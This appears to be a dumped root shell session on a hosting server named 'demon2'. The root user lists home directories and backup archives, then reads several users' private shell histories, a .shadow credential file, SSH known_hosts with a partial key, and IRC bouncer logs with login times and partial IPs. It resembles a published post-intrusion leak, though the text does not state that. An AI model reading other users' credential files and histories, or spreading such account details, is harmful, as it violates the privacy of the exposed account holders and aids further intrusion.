-drwx--x--x 6 exploiterc exploiterc 4096 Dec 15 13:10 exploiterc
-drwx--x--x 7 felosi felosi 4096 Feb 10 12:51 felosi
-drwx--x--x 6 felosii felosii 4096 Aug 1 2007 felosii
-drwxr-xr-x 2 root root 4096 Apr 22 2007 ftp
-drwx--x--x 9 g00ns83 g00ns83 4096 Apr 18 21:47 g00ns83
-drwx--x--x 10 g00nsts395 g00nsts395 4096 Apr 16 19:57 g00nsts395
-drwx--x--x 7 grumpy grumpy 4096 Aug 1 2007 grumpy
-drwx--x--x 4 hackrad hackrad 4096 Aug 2 2007 hackrad
-drwx--x--x 5 hanon hanon 4096 Mar 23 16:25 hanon
-drwx------ 2 silc silc 4096 Jan 4 23:12 help
-drwx--x--x 7 hthhost hthhost 4096 Dec 30 14:59 hthhost
-drwx------ 2 ident ident 4096 Feb 1 00:01 ident
-drwx--x--x 7 illmob illmob 4096 Apr 1 04:21 illmob
-drwx--x--x 5 lost lost 4096 Feb 19 19:07 lost
-drwx------ 2 root root 16384 Jul 31 2007 lost+found
-drwx--x--x 6 mycorp mycorp 4096 Aug 2 2007 mycorp
-drwx--x--x 8 party party 4096 Mar 7 18:20 party
-drwx--x--x 5 partyvan partyvan 4096 Jan 1 15:04 partyvan
-drwx--x--x 7 pingyill pingyill 4096 Aug 1 2007 pingyill
-drwx--x--x 5 564 565 4096 Mar 9 11:56 pr0be
-drwx--x--x 5 pvannet pvannet 4096 Mar 26 19:13 pvannet
-drwx--x--x 6 ragedns ragedns 4096 Aug 2 2007 ragedns
-drwx--x--x 6 rageserver rageserver 4096 Aug 1 2007 rageserver
-drwx--x--x 6 robo robo 4096 Aug 1 2007 robo
-drwx--x--x 15 shoutcas shoutcas 4096 Aug 6 2007 shoutcas
-drwx------ 3 silc silc 4096 Jan 18 16:08 silc
-drwx--x--x 7 sixtyz sixtyz 4096 Apr 16 19:09 sixtyz
-drwx--x--x 10 sn00g3s sn00g3s 4096 Apr 3 01:33 sn00g3s
-drwxrwxrwt 2 root root 4096 Apr 21 00:10 tmp
-drwx------ 5 tribal tribal 4096 Mar 26 07:36 tribal
-drwx--x--x 6 void void 4096 Aug 1 2007 void
-[root@demon2 home]# lastlog | grep -v Never
-Username Port From Latest
-root pts/1 74-34-107-191.ds Mon Apr 21 03:44:04 -0700 2008
-barnseo pts/1 Wed Mar 5 23:05:21 -0800 2008
-bnc pts/1 Sat Apr 19 20:27:10 -0700 2008
-partyvan pts/5 cpe-76-174-156-5 Tue Jan 1 15:27:39 -0800 2008
-[root@demon2 home]# cd 40zzz
-[root@demon2 40zzz]# ls -al
-total 24
-drwx------ 2 40zzz 40zzz 4096 Dec 21 21:57 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
--rw-r--r-- 1 40zzz 40zzz 24 Dec 21 21:57 .bash_logout
--rw-r--r-- 1 40zzz 40zzz 176 Dec 21 21:57 .bash_profile
--rw-r--r-- 1 40zzz 40zzz 124 Dec 21 21:57 .bashrc
-[root@demon2 40zzz]# cd ../admin
-[root@demon2 admin]# ls -al
-total 119196
-drwx--x--x 17 admin admin 4096 Feb 11 22:44 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
-lrwxrwxrwx 1 root root 21 Sep 13 2007 admin_backups -> /backup/admin_backups
-drwxrwxr-x 2 admin admin 4096 Aug 1 2007 admin_backups1
-drwx------ 2 admin admin 4096 Aug 1 2007 backups
--rw------- 1 admin admin 5774 Feb 11 22:50 .bash_history
--rw-r--r-- 1 admin admin 304 Apr 27 2006 .bash_logout
--rw-r--r-- 1 admin admin 191 Apr 27 2006 .bash_profile
--rw-r--r-- 1 admin admin 124 Apr 27 2006 .bashrc
--rw-rw-r-- 1 admin admin 6090 Jul 2 2007 da.cpanel.import.9beta1.tar.gz
--r--r--r-- 1 admin admin 20320 May 26 2007
--rwxr-xr-x 1 admin admin 272 Aug 6 2007 defaults.conf
-drwxr-xr-x 9 admin admin 4096 Jul 4 2007 domains
-drwx------ 2 admin admin 4096 Sep 29 2007 .elinks
--rw-r--r-- 1 admin admin 383 Apr 27 2006 .emacs
-drwxr-xr-x 4 admin admin 4096 Aug 1 2007 ex
-drwxrwxr-x 2 admin admin 4096 Oct 11 2007 export
-drwxrwx--- 5 admin admin 4096 Aug 1 2007 imap
-drwxrwxr-x 2 admin admin 4096 Oct 11 2007 import
-drwx------ 2 admin admin 4096 Aug 1 2007 mail
-drwxrwxr-x 2 admin admin 4096 Jan 4 2007 .mc
-drwxr-xr-x 6 admin admin 4096 May 15 2006 modsecurity-apache_1.9.4
--rw-rw-r-- 1 admin admin 496805 Jan 11 2007 modsecurity-apache_1.9.4.tar.gz
--rw------- 1 admin admin 419 Sep 29 2007 .nessusrc
-drwxr-xr-x 2 admin admin 4096 Jul 3 2007 public_html
--rw-r--r-- 1 admin admin 55412 Jul 3 2007 rulezz.conf
--rw-r----- 1 admin mail 34 Jun 29 2007 .shadow
-drwx------ 2 admin admin 4096 Aug 1 2007 .ssh
--rwx------ 1 admin admin 8515 Feb 10 15:41 t
--rw-r--r-- 1 admin admin 213250 Aug 1 2007 user.admin.alliancedn.tar.gz
--rw-r----- 1 admin admin 120993882 Aug 1 2007 user.admin.sn00g3s.tar.gz
-drwx--x--x 2 admin admin 4096 Dec 8 10:00 user_backups
-drwxr-xr-x 3 admin admin 4096 Sep 29 2007 webmail
-[root@demon2 admin]# cat .bash_history
-cd user_backups
-cd user_backups
-cd userbackups
-cd user_backups
-nano -w /etc/apf/deny_hosts.rules
-cd user_backups
-cd user-backups
-cd user_backups
-cp rosec.tar.gz /home/admin/domains
-cd /home/admin/domains
-mv rosec.tar.gz
-mv rosec.tar.gz public_html
-chmod 644 rosec.tar.gz
-rm -rf backup user_backups
-mkdir /home/admin/admin_backups
-mkdir user_backups
-cp *.tar.gz user_backups
-chmod 755 domains
-ls -la domains
-chmod 755 domains
-mv *.tar.gz user_backups
-ls user_backups
-crontab -e
-ls admin_backups
-rm -rf admin_backups
-cat /etc/hosts
-mkdir admin_backups
-cd admin*
-cd admin*
-rm -rf */tar.gz
-rm -rf *tar.gz
-cd admin*
-cat /etc/hosts
-mv user.admin.aosw.tar.gz admin_backups
-ls admin*
-ls -la admin*
-rm -rf backup-8.1.2007_11-19-41_g00ns83.tar.gz
-tar zxvf da.cpanel.import.9beta1.tar.gz
-nano -w defaults.conf
-nano -w defaults.conf
-chmod 755 defaults*
-nano -w defaults.conf
-mkdir import export
-rm -rf import
-mv cp import
-mkdir user_backups
-ls user*
-ls -la export
-cd export
-rm -rf niggerma.tar.gz sevenz.tar.gz
-mv *.tar.gz ../user_backups
-cd ..
-ls -la user_backups
-ls -la
-rm -rf backup-8.2.2007_18-32-22_g00ns83.tar.gz
-ls import
-cd import
-ls -la
-rm -rf backup*
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-cd import
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-rm -rf backup-8.2.2007_18-32-22_g00ns83.tar.gz
-cd import
-tar zxvf modsecurity-apache_1.9.4.tar.gz
-cd mod*
-cd apache1
-apxs -cia mod_security.c
-yum install httpd-devel
-cd import
-cd import
-cd import
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-cd import
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-cd import
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-ls -la
-cd export
-mv g00ns* ../user_backups
-cd /backup
-nano test
-rm -rf test
-ls backup
-rm -rf backup
-su admin
-ls export
-cd import
-rm -rf *.tar.gz
-rm -rf back*
-cd import
-nano -w defaults.conf
-ls export
-cd import
-cd export
-cp shoutcas.tar.gz ../user_backups
-cd /home/shou*
-ls -la export
-ls -la user_backups
-csf -a
-mv your* user_backups
-cd domains
-cd public_html
-cd domains
-cd prem*
-tar zxvf stat*
-tar zxvf stat.tar.gz
-mv status public_html
-cd domains
-cd public_html;
-tar zxvf nessus-php-0.7.tar.gz
-mv nessus-php-0.7/ nes
- .rpm&licence_accept=yes&t=aefdb0eaf2b035d672a91d4b551187b4
- rpm&licence_accept=yes&t=aefdb0eaf2b035d672a91d4b551187b4
-rm -rf index.html.1
-killall links
-rpm -i Nessus-3.0.6-es5.i386.rpm
-cd /opt
-cd ness*
-ls sbin
-cd import
-cd ..
-nano -w defaults.conf
-ls import
-rm -rf import/backup-8.6.2007_22-02-36_shoutcas.tar.gz
-ls export
-cp export/stockegg* user_backups
-ls user-Backups
-ls user_backups
-service named restart
-cd user_*
-cd user_*
-ls -la aryan88*
-cd user_*
-chmod 700 t
-[root@demon2 admin]# ls -al .ssh
-total 12
-drwx------ 2 admin admin 4096 Aug 1 2007 .
-drwx--x--x 17 admin admin 4096 Feb 11 22:44 ..
--rw-r--r-- 1 admin admin 220 Aug 1 2007 known_hosts
-[root@demon2 admin]# cat .ssh/*
- ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6qCFv8UowWc3dcRnWqzz4tPsx4Glt
-[root@demon2 admin]# ls -al /backup/admin_backups
-total 28936116
-drwxr-xr-x 2 admin admin 4096 Dec 30 16:49 .
-drwxr-xr-x 6 admin admin 4096 Feb 1 03:03 ..
--rw-r----- 1 admin felosi 11560 Sep 14 2007 admin.admin.felosi.tar.gz
--rw-r----- 1 admin admin 11404750600 Dec 18 21:28 admin.root.admin.tar.gz
--rw-r----- 1 admin admin 35395367 Aug 11 2007 reseller.admin.aaatrans.tar.gz
--rw-r----- 1 admin 535 2166835881 Sep 14 2007 reseller.admin.bwhost.tar.gz
--rw-r----- 1 admin 503 27875 Sep 14 2007 reseller.admin.llythexic.tar.gz
--rw-r----- 1 admin 549 8597301 Sep 14 2007 reseller.felosi.brinkhos.tar.gz
--rw-r----- 1 admin 552 5638521 Sep 14 2007 reseller.felosi.burn.tar.gz
--rw-r----- 1 admin alliancedn 264984 Dec 30 16:29 user.admin.alliancedn.tar.gz
--rw-r----- 1 admin aosw 541773752 Sep 14 2007 user.admin.aosw.tar.gz
--rw-r----- 1 admin 532 28274761 Sep 14 2007 user.admin.aryan88.tar.gz
--rw-r----- 1 admin 538 518730829 Dec 30 16:29 user.admin.asbestos.tar.gz
--rw-r----- 1 admin barnseo 16041617 Dec 18 21:29 user.admin.barnseo.tar.gz
--rw-r----- 1 admin bnc 2082640 Dec 30 16:29 user.admin.bnc.tar.gz
--rw-r----- 1 admin bored 3830711 Dec 18 21:29 user.admin.bored.tar.gz
--rw-r----- 1 admin churc0 4341166 Dec 18 21:29 user.admin.churc0.tar.gz
--rw-r----- 1 admin connors 652449 Dec 18 21:29 user.admin.connors.tar.gz
--rw-r----- 1 admin dougie 5454961654 Dec 30 16:37 user.admin.dougie.tar.gz
--rw-r----- 1 admin 558 20340587 Dec 18 21:37 user.admin.earn.tar.gz
--rw-r----- 1 admin egg 5530647 Dec 30 16:37 user.admin.egg.tar.gz
--rw-r----- 1 admin every 323268270 Dec 30 16:37 user.admin.every.tar.gz
--rw-r----- 1 admin evilcode 1607382248 Dec 30 16:40 user.admin.evilcode.tar.gz
--rw-r----- 1 admin excodeirc 113123361 Dec 30 16:41 user.admin.excodeirc.tar.gz
--rw-r----- 1 admin exploiterc 273460363 Dec 18 21:43 user.admin.exploiterc.tar.gz
--rw-r----- 1 admin felosii 202367 Dec 18 21:43 user.admin.felosii.tar.gz
--rw-r----- 1 admin g00ns83 1922138751 Dec 30 16:44 user.admin.g00ns83.tar.gz
--rw-r----- 1 admin g00nsts395 5616214 Dec 30 16:44 user.admin.g00nsts395.tar.gz
--rw-r----- 1 admin grumpy 207859624 Dec 30 16:44 user.admin.grumpy.tar.gz
--rw-r----- 1 admin 516 988823 Sep 14 2007 user.admin.hackersd.tar.gz
--rw-r----- 1 admin hackrad 371198425 Dec 30 16:45 user.admin.hackrad.tar.gz
--rw-r----- 1 admin 517 2334763 Dec 18 21:48 user.admin.high.tar.gz
--rw-r----- 1 admin illmob 593721185 Dec 30 16:46 user.admin.illmob.tar.gz
--rw-r----- 1 admin 519 104101941 Dec 18 21:49 user.admin.leetmach.tar.gz
--rw-r----- 1 admin mycorp 147245 Dec 30 16:46 user.admin.mycorp.tar.gz
--rw-r----- 1 admin partyvan 327144959 Dec 30 16:46 user.admin.partyvan.tar.gz
--rw-r----- 1 admin pingyill 30825336 Dec 30 16:47 user.admin.pingyill.tar.gz
--rw-r----- 1 admin ragedns 189555066 Dec 30 16:47 user.admin.ragedns.tar.gz
--rw-r----- 1 admin rageserver 255007 Dec 30 16:47 user.admin.rageserver.tar.gz
--rw-r----- 1 admin robo 290786 Dec 30 16:47 user.admin.robo.tar.gz
--rw-r----- 1 admin shoutcas 385370416 Dec 30 16:48 user.admin.shoutcas.tar.gz
--rw-r----- 1 admin sn00g3s 269230557 Dec 30 16:49 user.admin.sn00g3s.tar.gz
--rw-r----- 1 admin 524 1468386072 Sep 14 2007 user.admin.vg114.tar.gz
--rw-r----- 1 admin void 14594 Dec 30 16:49 user.admin.void.tar.gz
--rw-r----- 1 admin 548 75815612 Sep 14 2007 user.admin.yourgift.tar.gz
--rw-r----- 1 admin 551 626926 Sep 14 2007 user.brinkhos.bayw.tar.gz
--rw-r----- 1 admin 555 30546 Sep 14 2007 user.burn.kid652.tar.gz
--rw-r----- 1 admin 553 27271 Sep 14 2007 user.burn.lucasl123.tar.gz
--rw-r----- 1 admin 554 24648 Sep 14 2007 user.burn.rsuchow.tar.gz
--rw-r----- 1 admin 533 308158933 Sep 14 2007 user.bwhost.assault.tar.gz
--rw-r----- 1 admin 526 4716486 Sep 14 2007 user.bwhost.ballardt.tar.gz
--rw-r----- 1 admin 527 175245944 Sep 14 2007 user.bwhost.darkstorm.tar.gz
--rw-r----- 1 admin 528 597461 Sep 14 2007 user.bwhost.mffclan.tar.gz
--rw-r----- 1 admin 529 540182805 Sep 14 2007 user.bwhost.squad.tar.gz
--rw-r----- 1 admin 530 903208 Sep 14 2007 user.bwhost.tnpreacher.tar.gz
--rw-r----- 1 admin 531 71751894 Sep 14 2007 user.bwhost.xlostboyx.tar.gz
--rw-r----- 1 admin 550 8486403 Sep 14 2007 user.felosi.prox.tar.gz
-[root@demon2 admin]# ls -al backups
-total 8
-drwx------ 2 admin admin 4096 Aug 1 2007 .
-drwx--x--x 17 admin admin 4096 Feb 11 22:44 ..
-[root@demon2 admin]# cat .shadow
-[root@demon2 admin]# cd ../bnc
-[root@demon2 bnc]# ls -al
-total 364
-drwx--x--x 6 bnc bnc 4096 Aug 8 2007 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
--rw------- 1 bnc bnc 6018 Apr 19 20:31 .bash_history
--rw-r--r-- 1 bnc bnc 24 Aug 3 2007 .bash_logout
--rw-r--r-- 1 bnc bnc 176 Aug 3 2007 .bash_profile
--rw-r--r-- 1 bnc bnc 124 Aug 3 2007 .bashrc
-drwx--x--x 3 bnc bnc 4096 Aug 3 2007 domains
-drwxrwx--- 3 bnc mail 4096 Aug 3 2007 imap
-drwx------ 2 bnc bnc 4096 Aug 3 2007 mail
-drwxr-xr-x 12 bnc bnc 4096 Apr 20 23:41 psybnc
--rw-rw-r-- 1 bnc bnc 311715 Jun 4 2005 psyBNC-2.3.2-7.tar.gz
-lrwxrwxrwx 1 bnc bnc 35 Aug 3 2007 public_html -> ./domains/
--rw-r----- 1 bnc mail 34 Aug 3 2007 .shadow
-[root@demon2 bnc]# cat .bash_history
-ls public_html
-cd public_html/
-nano index.html
-cd $home
-mkdir bnc1
-cd bnc1
-tar -zxvf psyBNC-2.3.2-7.tar.gz
-cd psybnc
-make menuconfig
-./psybnc stop
-ps -aux
-kill 26364
-ps -aux
-kill 26364
-ps -aux
-kill 26364
-ps -aux
-nano psybnc.conf
-ps -aux
-kill 26364
-kill 26364
-kill -i 26364
-kill -9 26364
-ps -au
-ps -aux
-cd $home
-rm -rf bnc1
-tar zxvf psyBNC-2.3.2-7.tar.gz
-cd psybnc
-ls -al
-make menuconfig
-make menuconfig
-ps =aux
-ps -a
-ps -A
-kill -9 3365
-kill 3365
-cd psybnc/
-pico psybnc.conf
-text psybnc.conf
-nano psybnc.conf
-nano psybnc.conf
-cd psybnc
-nano psybnc.conf
-nano psybnc.conf
-cd tools
-cd ..
-cd scripts
-cd example/
-cd ..
-cd ..
-cd help
-cd ..
-nano psybnc.conf
-cd log
-cat psybnc.log
-cat psybnc.log
-cat psybnc.log
-cat psybnc.log
-cat psybnc.log
-cd ..
-nano psybnc.conf
-nano psybnc.conf
-cd log
-cat log
-cat psybnc.log
-cat psybnc.log
-cat psybnc.log
-cd ..
-cd ..
-ps -aux
-kill 4414
-ps -aux
-kill 4414
-ps -aux
-rm -rf psybnc
-ps -aux
-kill 4414
-ps -aux
-tar -zxvf psyBNC-2.3.2-7.tar.gz
-cd psybnc
-make menuconfig
-nano psybnc.conf
-ps -aux
-ps -aux
-rm -rf
-kill 1463
-ps -aux
-kill 1463
-ps -aux
-./psybnc restart
-./psybnc psybnc.conf
-ps -aux
-kill 1463
-ps -aux
-killall 1463
-kill 1463
-killall psybnc
-ps -aux
-kill -9 1463
-ps -aux
-ps -aux
-kill -9 2455
-ps -aux
-nano psybnc.conf
-nano psybnc.conf
-cd log
-nano log
-cat psybnc.log
-cd ..
-nano psybnc.conf
-cd ..
-rm -rf psybnc
-tar zxvf psyBNC-2.3.2-7.tar.gz
-ps -aux
-kill -9 2558
-cd psybnc
-ps -aux
-nano psybnc.conf
-nano psybnc.conf
-cd psybnc
-nano psybnc.conf
-cp psybnc.conf psybnc.1.conf
-cd psybnc
-cp psybnc.conf psybnc.1.conf
-nano psybnc.1.conf
-nano psybnc.1.conf
-nano psybnc.1.conf
-echo "" > psybnc.1.conf
-nano psybnc.1.conf
-./psybnc psybnc.1.conf
-cd psybnc
-nano psybncchk
-crontab -e
-crontab -e
-crontab -e
-crontab -e
-nano psybncchk
-nano psybncchk
-nano psybncchk
-ps -aux
-ps -aux
-cd psybnc
-cd log
-cat psybnc.log
-cat psybnc.log
-cat USER1.TRL
-cat USER2.TRL
-cat USER3.LOG
-cd ..
-cat psybnc.conf
-cd log
-cat psybnc.log
-cd ..
-nano psybnc.conf
-nano psybnc.conf
-nano psybnc.1.conf
-nano psybnc.conf
-cd tools
-cd ..
-cd key
-cd ..
-nano psybnc.1.conf
-cd log
-cat psybnc.log
-cd ..
-ps -aux
-kill -9 3514
-ps -aux
-./psybnc psybnc.conf
-cd psybnc
-nano psybnc.1.conf
-nano psybnc.1.conf
-grep -rn 'version' *
-ps -aux
-nano psybnc.1.conf
-nano psybnc.conf
-nano psybnc.1.conf
-nano psybnc.1.conf
-nano psybnc.1.conf
-nano psybnc.1.conf
-crontab -h
-crontab -l
-cd psybnc
-cp psybnc.1.conf psybnc.gso.conf
-nano psybnc.gso.conf
-nano psybnc.conf
-nano psybnc.conf
-nano psybnc.gso.conf
-./psybnc psybnc.gso.conf
-cd psybnc
-cat psybnc.conf
-cd psybnc/
-nano psybnc.gso.conf
-nano psybnc.conf
-ls psybnc
-ls domains
-ls public_html/
-ps -aux
-uname -a
-cd psybnc/
-mkdir probebnc
-cd probebnc
-tar -zxvf psyBNC-2.3.2-7.tar.gz
-cd psybnc/
-ls menuconf/
-cd $user
-cd psybnc
-rm -rf probebnc/
-ps -aux
-mkdir probe
-cd probe
-tar -zxvf psyBNC-2.3.2-7.tar.gz
-cd psybnc/
-cd $user
-cd psybnc/
-rm -rf probe
-mkdir probe
-cd probe
-tar -xzvf psyBNC2.3.1.tar.gz
-tar -xzvf psyBNC-2.3.2-7.tar.gz
-cd psybnc/
-nano config.h
-make menuconfig
-make menuconf
-make menuconfig
-nano psybnc.conf
-rm *
-rm -rf *
-cd $user
-cd psybnc/
-cd probe/
-rm -rf psybnc/
-tar -xzvf psyBNC-2.3.2-7.tar.gz
-cd psybnc/
-nano config.h
-make menuconfig
-cd $user/psybnc/probe
-cd $user
-cd psybnc/
-cd probe/
-rm -rf psybnc/
-tar -xzvf psyBNC-2.3.2-7.tar.gz
-cd psybnc/
-make menuconfig
-ps ax
-kill -9 9128 12320 24226 28825
-cd psybnc
-ps ax
-./psybnc psybnc.1.conf
-./psybnc psybnc.gso.conf
-cd psybnc
-head psybnc.1.conf
-head psybnc.gso.conf
-./psybnc psybnc.gso.conf
-ps -aiux
-ps -aux
-ps -aux
-kill 21054
-kill -9 21054
-./psybnc psybnc.gso.conf
-cd psy
-cd psybnc/
-cd probe/
-cd psybnc/
-ps -aux
-nano psybnc.conf
-nano psybnc.conf
-nano psybnc.conf.old
-nano config.h
-nano psybnc.conf
-nano log/psybnc.log
-cd $user
-cd psybnc/
-cd probe
-rm -rf psybnc/
-tar xzf psyBNC-2.3.2-7.tar.gz
-cd psy
-cd psybnc
-nano config.h
-nano REa
-nano README
-make menuconfig
-ps ax
-kill 1536
-ps ax
-kill 9672
-ps ax
-kill 9672
-ps axc
-ps ax
-./psybnc psybnc.gso.conf
-ps ax
-kill 1536
-ps ax
-kill -s 1536
-kill -9 9672
-ps ax
-kill -9 1536
-ps ax
-./psybnc psybnc.gso.conf
-ps ax
-ps ax
-kill -9 21041
-ps ax
-kill -9 21047
-ps ax
-kill -9 24942
-ps ax
-./psybnc psybnc.1.conf
-ps ax
-./psybnc psybnc.gso.conf
-ps ax
-kill -9 ./psybnc psybnc.1.conf
-kill -9 25484
-kill -9 25512
-ps ax
-cd help
-cd ..
-ps ax
-./psybnc psybnc.1.conf
-./psybnc psybnc.gso.conf
-ps ax
-cd psybnc
-head psybnc.conf
-head psybnc.1.conf
-cat psybnc.gso.conf
-head psybnc.gso.conf
-psybnc psybnc.gso.conf
-./psybnc psybnc.gso.conf
-cd psybnc
-head psybnc.gso.con
-head psybnc.gso.conf
-psybnc psybnc.gso.conf
-./psybnc psybnc.gso.conf
-cd psybnc
-head psybnc.gso.conf
-psybnc psybnc.gso.conf
-./psybnc psybnc.gso.conf
-ps -aux
-kill -9 17551
-ps -aux
-./psybnc psybnc.gso.conf
-ps -aux
-ps -aux
-ps -aux
-head psybnc.gso.conf
-cd psybnc
-head psybnc.gso.conf
-head psybnc.conf
-netstat | grep listen
-kill -9 31328
-./psybnc psybnc.gso.conf
-cd psybnc
-cat psybnc.gso.conf
-cd psybnc/
-cat psybnc.gso.conf
-[root@demon2 bnc]# cd psybnc
-[root@demon2 psybnc]# ls
-CHANGES log psybnc psybnc.gso.conf.old targets.mak
-config.h Makefile psybnc.1.conf TODO
-COPYING makefile.out psybnc.1.conf.old README tools
-FAQ makesalt psybncchk salt.h
-help menuconf psybnc.conf SCRIPTING
-key motd psybnc.conf.old scripts
-lang probe psybnc.gso.conf src
-[root@demon2 psybnc]# cat psybnc.1.conf
-USER4.SERVERS.SERVER3=addserver addserver
-[root@demon2 psybnc]# cat psybnc.conf
-[root@demon2 psybnc]# cat psybnc.gso.conf
-[root@demon2 psybnc]# cd log
-[root@demon2 log]# ls
-psybnc.log.old USER2.LOG USER3.LOG.old USER4.LOG.old USER6.TRL
-[root@demon2 log]# cat psybnc.log
-Sat Apr 19 15:06:18 :Listener created : port 11475
-Sat Apr 19 15:06:18 :psyBNC2.3.2-7-cBtITLdDMSNpE started (PID :14297)
-Sat Apr 19 15:06:18 :SSL initialized
-Sat Apr 19 15:06:18 :Loading all Users..
-Sat Apr 19 15:06:23 :connect from
-Sat Apr 19 15:06:23 :User admin () trying port 7001 (
-Sat Apr 19 15:06:23 :User admin () connected to (
-Sat Apr 19 15:06:23 :User admin got disconnected from server.
-Sat Apr 19 15:06:31 :User admin logged in.
-Sat Apr 19 15:06:38 :User sCuZz () trying port 6667 (
-Sat Apr 19 15:06:38 :User sCuZz () connected to (
-Sat Apr 19 15:06:53 :User admin () trying port 6667 (
-Sat Apr 19 15:06:53 :User admin () connected to (
-Sat Apr 19 15:43:14 :connect from
-Sat Apr 19 15:43:14 :User sCuZz logged in.
-Sat Apr 19 18:09:32 :User sCuZz disconnected (from
-Sat Apr 19 20:31:32 :connect from
-Sat Apr 19 20:31:32 :User sCuZz logged in.
-Sat Apr 19 20:47:24 :User sCuZz disconnected (from
-Sun Apr 20 00:20:44 :User admin quitted (from
-Sun Apr 20 08:58:52 :connect from
-Sun Apr 20 08:59:25 :User admin logged in.
-Sun Apr 20 11:27:16 :connect from
-Sun Apr 20 11:27:16 :User sCuZz logged in.
-Sun Apr 20 11:57:48 :User sCuZz disconnected (from
-Sun Apr 20 19:12:31 :User admin disconnected (from
-Sun Apr 20 21:42:46 :connect from
-Sun Apr 20 21:42:46 :User sCuZz logged in.
-Sun Apr 20 23:21:59 :connect from
-Sun Apr 20 23:21:59 :User sCuZz logged in.
-Sun Apr 20 23:24:04 :User sCuZz (sCuZz) disconnecting from stoned server.
-Sun Apr 20 23:24:04 :User sCuZz got disconnected from server.
-Sun Apr 20 23:24:15 :User sCuZz () trying port 6667 (
-Sun Apr 20 23:24:15 :User sCuZz () connected to (
-Sun Apr 20 23:24:29 :User sCuZz quitted (from
-Sun Apr 20 23:24:30 :connect from
-Sun Apr 20 23:24:30 :User sCuZz logged in.
-Sun Apr 20 23:25:11 :Hop requested by sCuZz. Quitting.
-Sun Apr 20 23:25:11 :User sCuZz got disconnected from server.
-Sun Apr 20 23:25:15 :User sCuZz () trying port 6667 (
-Sun Apr 20 23:25:15 :User sCuZz () connected to (
-Sun Apr 20 23:25:20 :User sCuZz quitted (from
-Sun Apr 20 23:25:21 :connect from
-Sun Apr 20 23:25:21 :User sCuZz logged in.
-Sun Apr 20 23:33:04 :User sCuZz quitted (from
-Sun Apr 20 23:41:01 :User sCuZz disconnected (from
-Mon Apr 21 10:40:13 :connect from
-Mon Apr 21 10:40:35 :User admin logged in.
-[root@demon2 log]# cd ../..
-[root@demon2 bnc]# cd psybnc/probe/
-[root@demon2 probe]# ls -al
-total 324
-drwxrwxr-x 3 bnc bnc 4096 Sep 23 2007 .
-drwxr-xr-x 12 bnc bnc 4096 Apr 20 23:41 ..
-drwxr-xr-x 11 bnc bnc 4096 Nov 15 18:37 psybnc
--rw-rw-r-- 1 bnc bnc 312177 Aug 19 2005 psyBNC-2.3.2-7.tar.gz
-[root@demon2 probe]# cd psybnc
-[root@demon2 psybnc]# ls
-CHANGES help Makefile motd psybnc.conf.old SCRIPTING TODO
-config.h key makefile.out psybnc scripts tools
-COPYING lang makesalt psybncchk README src
-FAQ log menuconf psybnc.conf salt.h targets.mak
-[root@demon2 psybnc]# cat psybnc.conf
-[root@demon2 psybnc]# cd log
-[root@demon2 log]# ls
-[root@demon2 log]# head psybnc.log
-Sun Sep 23 21:11:08 :Listener created : port 31337
-Sun Sep 23 21:11:08 :Can't create listening sock on host * port 31337 (bind)
-Sun Sep 23 21:11:08 :SSL initialized
-Sun Sep 23 21:11:08 :Loading all Users..
-Sun Sep 23 21:11:08 :psyBNC2.3.2-7-cBtITLdDMSNpE started (PID :9672)
-Sun Sep 23 21:11:13 :User pr0be () has no server added
-Sun Sep 23 21:12:43 :User pr0be () has no server added
-Sun Sep 23 21:14:13 :User pr0be () has no server added
-Sun Sep 23 21:14:15 :connect from
-Sun Sep 23 21:14:18 :User pr0be logged in.
-[root@demon2 log]# cd /home
-[root@demon2 home]# cd egg
-[root@demon2 egg]# ls -al
-total 1076
-drwx--x--x 10 egg egg 4096 Mar 23 11:26 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
--rw------- 1 egg egg 6532 Apr 14 23:11 .bash_history
--rw-r--r-- 1 egg egg 24 Aug 9 2007 .bash_logout
--rw-r--r-- 1 egg egg 176 Aug 9 2007 .bash_profile
--rw-r--r-- 1 egg egg 124 Aug 9 2007 .bashrc
-drwx--x--x 3 egg egg 4096 Aug 9 2007 domains
-drwxrwxr-x 3 egg egg 4096 Apr 14 23:10 efnet
-drwx------ 11 egg egg 4096 Apr 21 14:00 eggdrop
-drwxr-xr-x 10 egg egg 4096 Aug 13 2007 eggdrop1.6.18
--rw-rw-r-- 1 egg egg 1025608 Aug 13 2007 eggdrop1.6.18.tar.gz
-drwx------ 2 egg egg 4096 Aug 21 2007 .elinks
-drwxrwx--- 3 egg mail 4096 Aug 9 2007 imap
-drwx------ 2 egg egg 4096 Aug 9 2007 mail
-lrwxrwxrwx 1 egg egg 35 Aug 9 2007 public_html -> ./domains/
